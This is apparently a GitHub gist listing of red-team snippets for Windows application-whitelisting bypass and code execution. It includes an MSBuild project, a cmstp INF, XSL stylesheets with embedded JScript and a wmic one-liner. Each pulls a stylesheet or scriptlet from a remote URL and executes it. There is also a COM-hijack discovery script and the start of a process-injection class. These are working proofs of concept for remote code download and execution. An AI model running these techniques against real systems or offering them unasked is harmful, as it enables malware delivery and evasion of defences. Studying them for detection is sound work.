Skip to content

Instantly share code, notes, and snippets.

<!-- "c:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe" c:\test\xslt_fun.csproj -->
<Project DefaultTargets="RunMe" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="RunMe">
<XslTransformation
UseTrustedSettings="true"
XslInputPath="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/e0d2854caf81778da8aaf5fc0cf06f798d9db4dd/xsl-notepad.xsl"
XmlContent="&lt;?xml version=&quot;1.0&quot;?&gt;&lt;?xml-stylesheet type=&quot;text/xsl&quot;?&gt;&lt;a&gt;&lt;b&gt;&lt;c&gt;d&lt;/c&gt;&lt;/b&gt;&lt;/a&gt;"
OutputPaths="delete_me.txt" />
</Target>
</Project>
@RedTeams
RedTeams / poc.png
Created August 1, 2019 19:46 — forked from bohops/poc.png
MSBuild - Property functions -
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
- Abandoned COM Discovery Script.
- Makes a few assumptions, needs refinement (e.g. doesn't account for all extensions)
function GetMissing($server){$clsids=@{};cd $env:windir'\system32\';$srv=gwmi Win32_COMSetting | ?{$_.$server -ne $null};$srv | ForEach {$clsids.add($_.ComponentId,$_.$server)};$clsids.Keys | foreach {$p=[Environment]::ExpandEnvironmentVariables($clsids[$_]);$p=$p.Replace('"','');if($p.Contains('.exe ')){$p=$p.Substring(0,$p.IndexOf('.exe'))+'.exe'};if($(test-path $p) -eq $False){$_+' | '+$server+' | '+$p}}};GetMissing('LocalServer');GetMissing('LocalServer32');GetMissing('InprocServer');GetMissing('InprocServer32')
@RedTeams
RedTeams / Inject.cs
Created August 1, 2019 19:47 — forked from bohops/Inject.cs
DotNetToJScript Build Walkthrough
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
{
public TestClass()
{}
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:u="p" version="1.0"><ms:script implements-prefix="u" language="JScript">r=new ActiveXObject("http://WScript.Shell ").Run("cmd.exe")</ms:script></stylesheet>
@RedTeams
RedTeams / test.inf
Created August 1, 2019 19:48 — forked from bohops/test.inf
Test inf-sct execution (+++ @NickTyrer - https://gist.github.com/NickTyrer/)
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
GetObject("script:https://gist.githubusercontent.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct").Exec()
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
@RedTeams
RedTeams / wmic.xsl
Created August 1, 2019 19:53 — forked from Arno0x/wmic.xsl
Oneliner for arbitrary code download and execution
<?xml version='1.0'?>
<!-- Discovered by @SubTee and @mattifestation -->
<!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" -->
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[